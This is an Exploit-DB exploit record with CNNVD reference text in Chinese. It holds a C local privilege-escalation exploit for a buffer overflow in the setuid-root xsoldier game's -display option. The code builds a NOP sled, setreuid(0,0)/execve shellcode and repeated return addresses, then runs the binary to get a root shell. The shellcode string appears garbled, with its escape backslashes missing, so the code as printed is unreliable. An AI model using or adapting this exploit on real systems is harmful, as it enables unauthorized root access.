https://www.exploit-db.com/exploits/19677
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-069

xsoldier程序存在漏洞。本地用户借助超长参数可以提升根访问权。

/*
source: http://www.securityfocus.com/bid/871/info
 
Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console.
 
The binary itself is subject to a buffer overflow attack (which may be launched from the command line) which can be launched to gain root privileges. The overflow itself is in the code written to handle the -display option and is possible to overflow by a user-supplied long string.
 
The user does not have to have a valid $DISPLAY to exploit this.
*/

/*Larry W. Cashdollar linux xsolider exploit.
 *[email protected] http://vapid.dhs.org
 *if xsolider is built and installed from its source it will be installed
 *setuid root in /usr/local/games 
 *original exploit found by brock tellier for freebsd 3.3 ports packages.
 *If a setregid() call is placed in the shellcode, you can get egid=12
 *with the default mandrake installation.*/


#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90		/*no operation skip to next instruction. */
#define LEN 4480			/*our buffersize. */


char shellcode[] =		/*execve with setreuid(0,0) and no '/' hellkit v1.1 */
  "xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x6cx80x36x01x46xe2xfa"
  "xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01"
  "x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xc7x11"
  "x01x01x8cxbax1fxeexfexfexc6x44xfdx01x01x01x01x88x7cxf9xb9"
  "x47x01x01x01x30xf7x30xc8x52x88xf2xccx81x8cx4cxf9xb9x0ax01"
  "x01x01x88xffx30xd3x52x88xf2xccx81x30xc1x5ax5fx5ex88xedx5c"
  "xc2x91";


/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i, offset;
  long retaddr = get_sp ();

  if (argc <= 1)
    offset = 0;
  else
    offset = atoi (argv[1]);

/*#Copy the NOPs  in to the buffer leaving space for shellcode and
  #pointers*/

  for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
    *(buffer + i) = NOP;

/*[NNNNNNNNNNNNNNNNNNNNN                            ]*/
/*                      ^-- LEN -(strlen(shellcode)) - 35*/
/*#Copy the shell code into the buffer*/

  memcpy (buffer + i, shellcode, strlen (shellcode));

/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS            ]*/
/*                      ^-(buffer+i)                 */
/*#Fill the buffer with our new address to jump to esp + offset */

  for (i = i + strlen (shellcode); i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr+offset;

/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/
/*                                      ^-(i+strlen(shellcode))*/

  printf ("Jumping to address %x BufSize %dn", retaddr + offset, LEN);
  execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0);

}

来源:BID
名称:871
链接:http://www.securityfocus.com/bid/871
来源:marc.theaimsgroup.com
链接:http://marc.theaimsgroup.com/?l=freebsd-security&m;=94531826621620&w;=2